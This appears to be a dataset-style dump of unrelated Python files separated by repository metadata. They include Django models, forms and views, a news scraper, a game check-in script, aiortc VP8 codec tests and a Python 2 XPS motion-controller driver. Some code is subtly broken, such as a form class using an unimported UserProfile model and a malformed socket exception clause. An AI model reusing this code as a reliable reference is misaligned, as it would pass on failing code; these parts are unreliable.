You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from django.db import models
from session.models import Session
class GeneNames(models.Model):
    """External gene-name record, mapped onto the existing `gene_names` table.

    managed = False: Django neither creates nor migrates this table.
    """
    gene_names_id = models.AutoField(primary_key=True)
    external_id = models.CharField(max_length=32, blank=True, null=True, db_index=True)
    name = models.CharField(max_length=32, blank=True, null=True)
    source = models.CharField(max_length=32, blank=True, null=True)
    primary_id = models.IntegerField(blank=True, null=True)
    session = models.ForeignKey(Session, models.DO_NOTHING, blank=True, null=True)

    class Meta:
        managed = False
        db_table = 'gene_names'
| [
"prem.apa@gmail.com"
] | prem.apa@gmail.com |
23e5294a7b7449921844e85ddd6f3ba2a5d23c24 | bc1e1e11f77b4a9476a3dfe9259cd8c00d4f1b59 | /covLab/news2.py | eef2c0353ee207a30b3023bfa40d8db31a02ee43 | [] | no_license | covLab/covLabProject | d9b2addb698190b9125fe7908bb658c629bb10e2 | 4660d903391f64d9fb55c5ff675a73416cd44651 | refs/heads/master | 2023-07-09T03:46:54.179655 | 2021-08-09T06:07:19 | 2021-08-09T06:07:19 | 388,896,215 | 0 | 0 | null | 2021-08-08T20:25:53 | 2021-07-23T18:44:38 | JavaScript | UTF-8 | Python | false | false | 741 | py | from bs4 import BeautifulSoup as bs
import requests
# URL to crawl (Naver news search; the query string '코로나' is part of the URL and kept as-is)
url = 'https://search.naver.com/search.naver?where=news&sm=tab_jum&query=코로나'
# fetch the HTML document at the URL with requests
response = requests.get(url)
html_text = response.text
# parse the HTML document with BeautifulSoup
soup = bs(html_text, 'html.parser')
# grab a single headline via select_one and a CSS selector
# print(soup.select_one('a.news_tit').get_text())
# grab every headline via select and the same CSS selector
titles = soup.select('a.news_tit')
for i in titles:
    title = i.get_text()
    print(title)
| [
"juheelee1103@gmail.com"
] | juheelee1103@gmail.com |
7a8c1e3e34fea493f3dfaeb5fca5ab85cf5acb0d | a4828270932f114289c5dec29b75fb2b5d20fa84 | /ck_163game.py | 9ae0e7e6ee04854e1489dff6870dfb778132fffe | [] | no_license | gold-huiyun/check | d01621008c3f7e9ca680b38414d3625ca0350090 | b1491d59c3a91f0f26cfd8620e2bb4404151f77a | refs/heads/master | 2023-07-08T23:15:41.513429 | 2021-08-07T11:26:11 | 2021-08-07T11:26:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 981 | py | import requests
import json
from getENV import getENv
from checksendNotify import send
"""
建议cron: 20 8 * * *
new Env('网易云游戏');
"""
def game163(Authorization):
    """POST the daily sign-in request to NetEase Cloud Gaming.

    *Authorization* is the bearer token captured from the mobile app.
    Returns a short Chinese status string (runtime strings kept as-is).
    """
    headers = {
        'user-agent': 'Mozilla/5.0 (Linux; Android 10; Redmi K30 Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.127 Mobile Safari/537.36',
        ## fill in the parameter captured from the app below ########
        'Authorization': Authorization
    }
    url = 'http://n.cg.163.com/api/v2/sign-today'
    r = requests.post(url, headers=headers).text
    # NOTE(review): a body starting with "{" (i.e. a JSON reply) is treated as
    # an expired cookie and anything else as success -- confirm against the API
    if r[0] == "{":
        return "cookie已失效"
    else:
        return "签到成功"
def start():
    """Run the NetEase Cloud Gaming check-in.

    Loads the stored Authorization token from the quantum-panel config file,
    performs the sign-in via game163(), prints the result and pushes a
    notification.
    """
    getENv()
    with open("/ql/config/check.json", "r", encoding="utf-8") as f:
        datas = json.loads(f.read())
    # default must be a dict, not a list: the original ``datas.get("163game", [])``
    # made the following .get('Authorization') raise AttributeError when the
    # "163game" key was missing
    _check_item = datas.get("163game", {})
    res = game163(_check_item.get('Authorization'))
    print(res)
    send("网易云游戏", res)
if __name__ == "__main__":
start() | [
"yuxina158@gmail.com"
] | yuxina158@gmail.com |
14560bfee75c0c1baf3a6855302a488886061a12 | 56c4324b72fe629b218caa881557ec9102db9335 | /client/app/customerrors/error_handlers.py | 174bdbfafc8d83e243aed06d8ab1f9e2f51a0ce0 | [] | no_license | Gwirarien/FHE-Microservice | c25440f8aece546adaa34070c2b32744292fd54b | e7f96caa47258894391e329ecb1a1166e57ee04e | refs/heads/master | 2022-11-06T19:36:42.203562 | 2020-06-19T14:04:57 | 2020-06-19T14:04:57 | 241,149,322 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 466 | py | from flask import render_template
from app.customerrors import customerrors
@customerrors.app_errorhandler(403)
def error_403(error):
    """Render the custom 403 (forbidden) page with a matching status code."""
    return render_template('custom_errors/403_response.html'), 403
@customerrors.app_errorhandler(404)
def error_404(error):
    """Render the custom 404 (not found) page with a matching status code."""
    return render_template('custom_errors/404_response.html'), 404
@customerrors.app_errorhandler(500)
def error_500(error):
    """Render the custom 500 (server error) page with a matching status code."""
    return render_template('custom_errors/500_response.html'), 500
"obangbranes@yahoo.com"
] | obangbranes@yahoo.com |
b2593039192806f4ff7a7f440cd0cc0ee6d2ff11 | 9f3396ff452dad6674a25f270d3006d35d485428 | /apps/users/form.py | 6abc57190814bfd2070d9bef4a928fa500ecbfb6 | [] | no_license | zuimeideshi/MxOnline | 490d8b885039c3ff03e25825b73553864d434092 | 02ae62abf6301e060c9588af20ddc117524d68e0 | refs/heads/master | 2022-09-26T02:09:54.883866 | 2020-06-02T08:49:09 | 2020-06-02T08:49:09 | 268,747,822 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,007 | py | # users/forms.py
from django import forms
from captcha.fields import CaptchaField
class LoginForm(forms.Form):
    '''Login validation form.'''
    username = forms.CharField(required=True)
    password = forms.CharField(required=True,min_length=5)
class RegisterForm(forms.Form):
    '''Registration validation form.'''
    email = forms.EmailField(required=True)
    password = forms.CharField(required=True,min_length=5)
    # CAPTCHA field; the 'invalid' message is user-facing Chinese text, kept as-is
    captcha = CaptchaField(error_messages={'invalid':'验证码错误'})
class ForgetPwdForm(forms.Form):
    '''Forgotten-password form: e-mail plus CAPTCHA.'''
    email = forms.EmailField(required=True)
    captcha = CaptchaField(error_messages={'invalid': '验证码错误'})
class UploadImageForm(forms.ModelForm):
    '''Form for changing the user's avatar image.'''
    # NOTE(review): UserProfile is not imported in this module's visible
    # imports -- this raises NameError at import time; confirm the import
    class Meta:
        model = UserProfile
        fields = ['image']
class UserInfoForm(forms.ModelForm):
    '''Profile-page form for editing personal information.'''
    # NOTE(review): UserProfile is not imported in this module's visible
    # imports -- this raises NameError at import time; confirm the import
    class Meta:
        model = UserProfile
        fields = ['nick_name','gender','birthday','address','mobile']
"2448229422@qq.com"
] | 2448229422@qq.com |
7435cb4326ad4524d0fc2e28967a7c3c8443d22e | be5046fe3611e46f4a5e34e8b23e59aacd0976fd | /smartersn/smartertesting/views.py | dc0229242ab408480ce43520001d297f440a4173 | [] | no_license | manvillej/SmarterTestingSN | ebdbc1680f1db2bf8369371e2534a517ee62ad47 | e588baf32f667f538c8c236eb92cbc14fb341406 | refs/heads/master | 2022-12-11T12:53:54.408966 | 2018-08-09T20:37:19 | 2018-08-09T20:37:19 | 143,559,918 | 0 | 0 | null | 2022-12-08T02:21:38 | 2018-08-04T20:11:27 | Python | UTF-8 | Python | false | false | 9,796 | py | from django.shortcuts import render, redirect
from django.views.generic import View
from django.template import loader
from django.http import HttpResponse
from django.db import IntegrityError
from django.contrib.auth import authenticate, login
from django.contrib.auth.decorators import login_required
from django.contrib.auth.mixins import LoginRequiredMixin
import xmltodict
import json
from .forms import UploadFileForm, ObjectTestRelationshipForm, UserForm
from .models import UpdateSet, SNObjectType, SNObject, SNTest, SNTestObjectRelation, Upload, ObjectUploadRelation
from .SNIntegration import SNInstance
@login_required
def uploads(request):
    """List view of all uploads; also refreshes tests from the ServiceNow instance."""
    template = loader.get_template("smartertesting/uploads.html")
    context = {
        "uploads":Upload.objects.all(),
    }
    # update tests from SN
    dev = SNInstance()
    dev.get_tests()
    return HttpResponse(template.render(context, request))
@login_required
def upload_details(request, upload_id):
    """Detail view of one upload: the upload itself, the SN objects it
    contains, and the tests related to those objects.

    Also refreshes tests from the ServiceNow instance first.
    """
    template = loader.get_template("smartertesting/upload_details.html")
    # update tests from SN
    dev = SNInstance()
    dev.get_tests()
    upload = Upload.objects.get(id=upload_id)
    # (removed the original dead SNObject.objects.all() / SNTest.objects.all()
    # assignments -- both were immediately overwritten below)
    object_relations = ObjectUploadRelation.objects.all().filter(upload=upload)
    sn_objects = {relation.sn_object for relation in object_relations}
    relations = SNTestObjectRelation.objects.all().filter(sn_object__in=sn_objects)
    tests = {relation.test for relation in relations}
    context = {
        "upload":upload,
        "sn_objects":sn_objects,
        "tests":tests,
    }
    return HttpResponse(template.render(context, request))
@login_required
def sn_objects(request):
    """List view of all SN objects; also refreshes tests from the ServiceNow instance."""
    template = loader.get_template("smartertesting/sn_objects.html")
    context = {
        "sn_objects":SNObject.objects.all(),
    }
    # update tests from SN
    dev = SNInstance()
    dev.get_tests()
    return HttpResponse(template.render(context, request))
@login_required
def sn_object_details(request, object_id):
    """Detail view of one SN object and the tests related to it."""
    # update tests from SN
    dev = SNInstance()
    dev.get_tests()
    template = loader.get_template("smartertesting/sn_object_details.html")
    sn_object = SNObject.objects.get(id=object_id)
    relations = SNTestObjectRelation.objects.all().filter(sn_object=object_id)
    tests = {relation.test for relation in relations}
    context = {
        "sn_object":sn_object,
        "tests":tests,
    }
    return HttpResponse(template.render(context, request))
@login_required
def sn_tests(request):
    """List view of all tests, refreshed from the ServiceNow instance first."""
    # update tests from SN
    dev = SNInstance()
    dev.get_tests()
    template = loader.get_template("smartertesting/sn_tests.html")
    context = {
        "tests":SNTest.objects.all(),
    }
    return HttpResponse(template.render(context, request))
@login_required
def sn_test_details(request, test_id):
    """Detail view of one test and the SN objects related to it."""
    # update tests from SN
    dev = SNInstance()
    dev.get_tests()
    template = loader.get_template("smartertesting/sn_test_details.html")
    test = SNTest.objects.get(id=test_id)
    relations = SNTestObjectRelation.objects.all().filter(test=test_id)
    sn_objects = {relation.sn_object for relation in relations}
    context = {
        "test":test,
        "sn_objects":sn_objects,
    }
    return HttpResponse(template.render(context, request))
class ObjectTestRelationFormView(LoginRequiredMixin, View):
    """Form view for linking a test to an SN object."""
    form_class = ObjectTestRelationshipForm
    template_name = "smartertesting/upload.html"

    def get(self, request):
        """Render an empty relationship form (after refreshing tests from SN)."""
        # update tests from SN
        dev = SNInstance()
        dev.get_tests()
        form = self.form_class(None)
        return render(request, self.template_name, {'form': form})

    def post(self, request):
        """Create the object/test relation described by the submitted form."""
        form = self.form_class(request.POST)
        if(form.is_valid()):
            sn_object = form.cleaned_data['sn_object']
            test = form.cleaned_data['test']
            relationship = form.cleaned_data['relationship']
            # catch error if the user tries to create an existing relationship
            try:
                sn_relation = SNTestObjectRelation(test=test, sn_object=sn_object, description=relationship)
                sn_relation.save()
            except IntegrityError:
                # TODO: tell the user they can't insert the same relationship twice
                pass
        return render(request, self.template_name, {'form': self.form_class(None)})
class UploadFormView(LoginRequiredMixin, View):
    """Form view for uploading exported ServiceNow update-set XML files.

    POST parses the XML with xmltodict, creates an Upload row from the
    remote update-set header, then walks each contained update and records
    Business Rules as SNObject rows linked to the Upload. Other update
    types are currently skipped (see in-line notes).
    """
    form_class = UploadFileForm
    template_name = "smartertesting/upload.html"

    def get(self, request):
        """Render an empty upload form."""
        form = self.form_class(None)
        return render(request, self.template_name, {'form': form})

    def post(self, request):
        """Parse the uploaded update-set XML and persist its contents."""
        form = self.form_class(request.POST, request.FILES)
        if(form.is_valid()):
            xml_file = request.FILES['file']
            remote_update_set = xmltodict.parse(xml_file)
            updates = remote_update_set["unload"]["sys_update_xml"]
            # header fields of the remote update set
            update_set_name = remote_update_set["unload"]["sys_remote_update_set"]["name"]
            update_set_id = remote_update_set["unload"]["sys_remote_update_set"]["sys_id"]
            description = remote_update_set["unload"]["sys_remote_update_set"]["description"]
            # create upload to log objects against
            upload = Upload(
                update_set_name=update_set_name,
                update_set_id=update_set_id,
                description=description,)
            upload.save()
            # iterate through the updates
            for update in updates:
                # decode payload xml
                # used to skip a particular set of updates that it can't handle yet
                if(not isinstance(update, dict)):
                    continue
                update_payload = xmltodict.parse(update["payload"])
                record_update = update_payload["record_update"]
                record_update_keys = list(record_update.keys())
                # only handling @table for now.
                if("@table" in record_update_keys):
                    table = record_update["@table"]
                    # get or create the type of SN object
                    update_type = update["type"]
                    try:
                        sn_type = SNObjectType.objects.get(name=update_type)
                    except SNObjectType.DoesNotExist:
                        sn_type = SNObjectType(name=update_type, code_name=table)
                        sn_type.save()
                    # another unhandled type
                    if(update_type=="Workflow"):
                        continue
                    # print(update_type)
                    # print(f'{update["type"]}, {table}: {record_update[table]["sys_id"]}')
                    # print(sorted(list(record_update[table].keys())))
                    if(update_type=="Business Rule"):
                        # cart = Cart(customer=user, state=new)
                        sys_id = record_update[table]["sys_id"]
                        name = record_update[table]["name"]
                        try:
                            sn_object = SNObject.objects.get(sys_id=sys_id)
                        except SNObject.DoesNotExist:
                            sn_object = SNObject(sys_id=sys_id, name=name, object_type=sn_type)
                            sn_object.save()
                        relation = ObjectUploadRelation(upload=upload, sn_object=sn_object)
                        relation.save()
                else:
                    """
                    known unhandled types:
                    key = "sys_dictionary"
                    key = "sys_documentation"
                    key = "sys_ui_section"
                    """
                    pass
        return render(request, self.template_name, {'form': form})
class UserFormView(View):
    """Registration view: renders the sign-up form and creates + logs in the user."""
    form_class = UserForm
    template_name = "smartertesting/registration_form.html"

    def get(self, request):
        """Display a blank registration form."""
        form = self.form_class(None)
        return render(request, self.template_name, {'form': form})

    def post(self, request):
        """Validate the form, create the user with a hashed password, and log them in."""
        form = self.form_class(request.POST)
        if(form.is_valid()):
            user = form.save(commit=False)
            # cleaned normalized data
            username = form.cleaned_data['username']
            password = form.cleaned_data['password']
            email = form.cleaned_data['email']
            user.username = username
            user.email = email
            # hash the password
            user.set_password(password)
            user.save()
            # returns user object if credentials are correct
            user = authenticate(username=username, password=password)
            if user is not None:
                if user.is_active:
                    login(request, user)
                    return redirect('index')
        return render(request, self.template_name, {'form': form})
| [
"jeffmanvillejr@gmail.com"
] | jeffmanvillejr@gmail.com |
0ac4e38308fb4ff518727b8ee1195fa098b9eb57 | 9a94357b2cc45b1e6a56c5c309fad0f717e96b2b | /tests/test_vpx.py | 108360a809ec883ab5d5c6b8521ffbd7c1e719a3 | [
"BSD-3-Clause"
] | permissive | gitter-badger/aiortc | 34099aee833a56d36f53b74336a2e7344d274cf3 | 0417b6b9c75dd4fc9f049ddeda7f09f306318574 | refs/heads/master | 2020-03-30T11:22:22.704701 | 2018-10-01T12:49:46 | 2018-10-01T13:16:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,489 | py | from unittest import TestCase
from aiortc.codecs import get_decoder, get_encoder
from aiortc.codecs.vpx import (Vp8Decoder, Vp8Encoder, VpxPayloadDescriptor,
_vpx_assert, number_of_threads)
from aiortc.mediastreams import VIDEO_TIME_BASE, VideoFrame
from aiortc.rtcrtpparameters import RTCRtpCodecParameters
from .codecs import CodecTestCase
VP8_CODEC = RTCRtpCodecParameters(name='VP8', clockRate=90000)
class VpxPayloadDescriptorTest(TestCase):
    """Parse/serialise round-trip tests for the VP8 payload descriptor
    (RFC 7741): no picture id, 7-bit and 15-bit picture ids, TL0PICIDX,
    TID and KEYIDX variants."""
    def test_no_picture_id(self):
        descr, rest = VpxPayloadDescriptor.parse(b'\x10')
        self.assertEqual(descr.partition_start, 1)
        self.assertEqual(descr.partition_id, 0)
        self.assertEqual(descr.picture_id, None)
        self.assertEqual(descr.tl0picidx, None)
        self.assertEqual(descr.tid, None)
        self.assertEqual(descr.keyidx, None)
        self.assertEqual(bytes(descr), b'\x10')
        self.assertEqual(repr(descr), 'VpxPayloadDescriptor(S=1, PID=0, pic_id=None)')
        self.assertEqual(rest, b'')

    def test_short_picture_id_17(self):
        """
        From RFC 7741 - 4.6.3
        """
        descr, rest = VpxPayloadDescriptor.parse(b'\x90\x80\x11')
        self.assertEqual(descr.partition_start, 1)
        self.assertEqual(descr.partition_id, 0)
        self.assertEqual(descr.picture_id, 17)
        self.assertEqual(descr.tl0picidx, None)
        self.assertEqual(descr.tid, None)
        self.assertEqual(descr.keyidx, None)
        self.assertEqual(bytes(descr), b'\x90\x80\x11')
        self.assertEqual(repr(descr), 'VpxPayloadDescriptor(S=1, PID=0, pic_id=17)')
        self.assertEqual(rest, b'')

    def test_short_picture_id_127(self):
        descr, rest = VpxPayloadDescriptor.parse(b'\x90\x80\x7f')
        self.assertEqual(descr.partition_start, 1)
        self.assertEqual(descr.partition_id, 0)
        self.assertEqual(descr.picture_id, 127)
        self.assertEqual(descr.tl0picidx, None)
        self.assertEqual(descr.tid, None)
        self.assertEqual(descr.keyidx, None)
        self.assertEqual(bytes(descr), b'\x90\x80\x7f')
        self.assertEqual(rest, b'')

    def test_long_picture_id_128(self):
        descr, rest = VpxPayloadDescriptor.parse(b'\x90\x80\x80\x80')
        self.assertEqual(descr.partition_start, 1)
        self.assertEqual(descr.partition_id, 0)
        self.assertEqual(descr.picture_id, 128)
        self.assertEqual(descr.tl0picidx, None)
        self.assertEqual(descr.tid, None)
        self.assertEqual(descr.keyidx, None)
        self.assertEqual(bytes(descr), b'\x90\x80\x80\x80')
        self.assertEqual(rest, b'')

    def test_long_picture_id_4711(self):
        """
        From RFC 7741 - 4.6.5
        """
        descr, rest = VpxPayloadDescriptor.parse(b'\x90\x80\x92\x67')
        self.assertEqual(descr.partition_start, 1)
        self.assertEqual(descr.partition_id, 0)
        self.assertEqual(descr.picture_id, 4711)
        self.assertEqual(descr.tl0picidx, None)
        self.assertEqual(descr.tid, None)
        self.assertEqual(descr.keyidx, None)
        self.assertEqual(bytes(descr), b'\x90\x80\x92\x67')
        self.assertEqual(rest, b'')

    def test_tl0picidx(self):
        descr, rest = VpxPayloadDescriptor.parse(b'\x90\xc0\x92\x67\x81')
        self.assertEqual(descr.partition_start, 1)
        self.assertEqual(descr.partition_id, 0)
        self.assertEqual(descr.picture_id, 4711)
        self.assertEqual(descr.tl0picidx, 129)
        self.assertEqual(descr.tid, None)
        self.assertEqual(descr.keyidx, None)
        self.assertEqual(bytes(descr), b'\x90\xc0\x92\x67\x81')
        self.assertEqual(rest, b'')

    def test_tid(self):
        descr, rest = VpxPayloadDescriptor.parse(b'\x90\x20\xe0')
        self.assertEqual(descr.partition_start, 1)
        self.assertEqual(descr.partition_id, 0)
        self.assertEqual(descr.picture_id, None)
        self.assertEqual(descr.tl0picidx, None)
        self.assertEqual(descr.tid, (3, 1))
        self.assertEqual(descr.keyidx, None)
        self.assertEqual(bytes(descr), b'\x90\x20\xe0')
        self.assertEqual(rest, b'')

    def test_keyidx(self):
        descr, rest = VpxPayloadDescriptor.parse(b'\x90\x10\x1f')
        self.assertEqual(descr.partition_start, 1)
        self.assertEqual(descr.partition_id, 0)
        self.assertEqual(descr.picture_id, None)
        self.assertEqual(descr.tl0picidx, None)
        self.assertEqual(descr.tid, None)
        self.assertEqual(descr.keyidx, 31)
        self.assertEqual(bytes(descr), b'\x90\x10\x1f')
        self.assertEqual(rest, b'')
class Vp8Test(CodecTestCase):
    """VP8 codec tests: codec factory lookup, encoder packetisation
    (payloads capped at 1300 bytes), thread-count heuristic and
    encode/decode round trips at several resolutions."""
    def test_assert(self):
        with self.assertRaises(Exception) as cm:
            _vpx_assert(1)
        self.assertEqual(str(cm.exception), 'libvpx error: Unspecified internal error')

    def test_decoder(self):
        decoder = get_decoder(VP8_CODEC)
        self.assertTrue(isinstance(decoder, Vp8Decoder))

    def test_encoder(self):
        encoder = get_encoder(VP8_CODEC)
        self.assertTrue(isinstance(encoder, Vp8Encoder))
        frame = VideoFrame(width=640, height=480)
        frame.pts = 0
        frame.time_base = VIDEO_TIME_BASE
        payloads, timestamp = encoder.encode(frame)
        self.assertEqual(len(payloads), 1)
        self.assertTrue(len(payloads[0]) < 1300)
        self.assertEqual(timestamp, 0)
        # change resolution
        frame = VideoFrame(width=320, height=240)
        frame.pts = 3000
        frame.time_base = VIDEO_TIME_BASE
        payloads, timestamp = encoder.encode(frame)
        self.assertEqual(len(payloads), 1)
        self.assertTrue(len(payloads[0]) < 1300)
        self.assertEqual(timestamp, 3000)

    def test_encoder_large(self):
        encoder = get_encoder(VP8_CODEC)
        self.assertTrue(isinstance(encoder, Vp8Encoder))
        # first keyframe
        frame = VideoFrame(width=2560, height=1920)
        frame.pts = 0
        frame.time_base = VIDEO_TIME_BASE
        payloads, timestamp = encoder.encode(frame)
        self.assertEqual(len(payloads), 7)
        self.assertEqual(len(payloads[0]), 1300)
        self.assertEqual(timestamp, 0)
        # delta frame
        frame = VideoFrame(width=2560, height=1920)
        frame.pts = 3000
        frame.time_base = VIDEO_TIME_BASE
        payloads, timestamp = encoder.encode(frame)
        self.assertEqual(len(payloads), 1)
        self.assertTrue(len(payloads[0]) < 1300)
        self.assertEqual(timestamp, 3000)
        # force keyframe
        frame = VideoFrame(width=2560, height=1920)
        frame.pts = 6000
        frame.time_base = VIDEO_TIME_BASE
        payloads, timestamp = encoder.encode(frame, force_keyframe=True)
        self.assertEqual(len(payloads), 7)
        self.assertEqual(len(payloads[0]), 1300)
        self.assertEqual(timestamp, 6000)

    def test_number_of_threads(self):
        self.assertEqual(number_of_threads(1920 * 1080, 16), 8)
        self.assertEqual(number_of_threads(1920 * 1080, 8), 3)
        self.assertEqual(number_of_threads(1920 * 1080, 4), 2)
        self.assertEqual(number_of_threads(1920 * 1080, 2), 1)

    def test_roundtrip_1280_720(self):
        self.roundtrip_video(VP8_CODEC, 1280, 720)

    def test_roundtrip_960_540(self):
        self.roundtrip_video(VP8_CODEC, 960, 540)

    def test_roundtrip_640_480(self):
        self.roundtrip_video(VP8_CODEC, 640, 480)

    def test_roundtrip_320_240(self):
        self.roundtrip_video(VP8_CODEC, 320, 240)
| [
"jeremy.laine@m4x.org"
] | jeremy.laine@m4x.org |
b2e1e547eb7cb40072a470450961ec3ea2a10584 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_118/652.py | 4beb500f3c8a4122fb591a82efec72a0653e53da | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,386 | py |
n = int(raw_input())
for c in range(n):
(A,B) = (int(r) for r in raw_input().split(' '))
L = len(str(B))
ans = []
out = 0
# The odd ones out
for v in (1,4,9):
if A <= v <= B:
ans.append(v)
out += 1
# Twos
for d in range(L/2+2):
s = '2'+'0'*d+'2'
sq = int(s)**2
#print s,sq
if A <= sq <= B: out += 1
if A <= sq <= B: ans.append(sq)
for d in range(L/4+2):
s = '2'+'0'*d+'1'+'0'*d+'2'
sq = int(s)**2
if A <= sq <= B: out += 1
if A <= sq <= B: ans.append(sq)
# Binary
p = [0,0,0,0,0]
beg = set()
for p[0] in range(L/4+2):
for p[1] in range(min(p[0],L/4+1),L/4+2):
for p[2] in range(min(p[1],L/4+1),L/4+2):
for p[3] in range(min(p[2],L/4+1),L/4+2):
for p[4] in range(min(p[3],L/4+1),L/4+2):
s = ['0'] * (L/4+1)
for pos in range(5):
if p[pos] < (L/4+1): s[p[pos]] = '1'
a = ''.join(s)
a = a[(a+'1').find('1'):]
beg.add(a)
for b in beg:
if b:
if sum([int(u) for u in b]) >= 5: continue
rev = [b+b[::-1],b+'0'+b[::-1],b+'1'+b[::-1],b+'2'+b[::-1]]
for v in rev:
v2 = int(v)**2
s = str(v2)
if A <= v2 <= B and s == s[::-1]: out += 1
if A <= v2 <= B and s == s[::-1]: ans.append(v2)
print "Case #%d: %d" % (c+1,out)
#y = len(list(set(range(A,B+1)).intersection(set([1,4,9,121,484]))))
#print A,B, ans
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
01cbd38775e6711e0d9de13848d0d67948a4adbf | 35f494e951ec449e8dc4a796f82f637e35ea18db | /geoalchemy2/admin/dialects/__init__.py | 6d1e5f6c2739d84fc783d1fcb668ac0540b1e54e | [
"MIT"
] | permissive | geoalchemy/geoalchemy2 | e083d0ab6d181a3e65a9a46882c04ddf799aee86 | 80e738d09c6929305376f245bbd38fe7ff22b3f8 | refs/heads/master | 2023-09-01T04:12:29.463815 | 2023-07-25T13:59:39 | 2023-07-25T13:59:39 | 5,638,538 | 492 | 104 | MIT | 2023-09-12T07:49:46 | 2012-09-01T10:00:24 | Python | UTF-8 | Python | false | false | 366 | py | """This module defines some dialect-specific functions used for administration tasks."""
from geoalchemy2.admin.dialects import common # noqa
from geoalchemy2.admin.dialects import geopackage # noqa
from geoalchemy2.admin.dialects import mysql # noqa
from geoalchemy2.admin.dialects import postgresql # noqa
from geoalchemy2.admin.dialects import sqlite # noqa
| [
"noreply@github.com"
] | geoalchemy.noreply@github.com |
a0ab6ad9437802c9e710e2446a34b6e0e6f0927f | 298e100a601f3edcc4b9c8dd465d934554b87065 | /config/XPS/xps_config_oct2010/XPS_C8_drivers.py | 694dd48501e6ca5bf579217deeb004b6ff834df9 | [] | no_license | newville/xrmcollect | 27bc673d1a1e0cd6ab928e27fd4964e7ca5eddd4 | f479e8812a244d478b456dab942506892180f17d | refs/heads/master | 2023-08-24T17:57:38.090068 | 2016-05-11T21:32:15 | 2016-05-11T21:32:15 | 1,025,945 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 109,311 | py | # XPS Python class
#
# for XPS-C8 Firmware V2.6.x
#
# See Programmer's manual for more information on XPS function calls
import socket
class XPS:
# Defines
MAX_NB_SOCKETS = 100
# Global variables
__sockets = {}
__usedSockets = {}
__nbSockets = 0
# Initialization Function
def __init__ (self):
XPS.__nbSockets = 0
for socketId in range(self.MAX_NB_SOCKETS):
XPS.__usedSockets[socketId] = 0
# Send command and get return
def __sendAndReceive (self, socketId, command):
try:
XPS.__sockets[socketId].send(command)
ret = XPS.__sockets[socketId].recv(1024)
while (ret.find(',EndOfAPI') == -1):
ret += XPS.__sockets[socketId].recv(1024)
except socket.timeout:
return [-2, '']
except socket.error (errNb, errString):
print 'Socket error : ' + errString
return [-2, '']
for i in range(len(ret)):
if (ret[i] == ','):
return [int(ret[0:i]), ret[i+1:-9]]
# TCP_ConnectToServer
def TCP_ConnectToServer (self, IP, port, timeOut):
socketId = 0
if (XPS.__nbSockets < self.MAX_NB_SOCKETS):
while (XPS.__usedSockets[socketId] == 1 and socketId < self.MAX_NB_SOCKETS):
socketId += 1
if (socketId == self.MAX_NB_SOCKETS):
return -1
else:
return -1
XPS.__usedSockets[socketId] = 1
XPS.__nbSockets += 1
try:
XPS.__sockets[socketId] = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
XPS.__sockets[socketId].connect((IP, port))
XPS.__sockets[socketId].settimeout(timeOut)
XPS.__sockets[socketId].setblocking(1)
except socket.error:
return -1
return socketId
# TCP_SetTimeout
def TCP_SetTimeout (self, socketId, timeOut):
if (XPS.__usedSockets[socketId] == 1):
XPS.__sockets[socketId].settimeout(timeOut)
# TCP_CloseSocket
def TCP_CloseSocket (self, socketId):
if (socketId >= 0 and socketId < self.MAX_NB_SOCKETS):
try:
XPS.__sockets[socketId].close()
XPS.__usedSockets[socketId] = 0
XPS.__nbSockets -= 1
except socket.error:
pass
# GetLibraryVersion
def GetLibraryVersion (self):
return ['XPS-C8 Firmware V2.6.x Beta 19']
# ControllerMotionKernelTimeLoadGet : Get controller motion kernel time load
def ControllerMotionKernelTimeLoadGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ControllerMotionKernelTimeLoadGet(double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# ControllerStatusGet : Read controller current status
def ControllerStatusGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ControllerStatusGet(int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# ControllerStatusStringGet : Return the controller status string corresponding to the controller status code
def ControllerStatusStringGet (self, socketId, ControllerStatusCode):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ControllerStatusStringGet(' + str(ControllerStatusCode) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# ElapsedTimeGet : Return elapsed time from controller power on
def ElapsedTimeGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ElapsedTimeGet(double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# ErrorStringGet : Return the error string corresponding to the error code
def ErrorStringGet (self, socketId, ErrorCode):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ErrorStringGet(' + str(ErrorCode) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
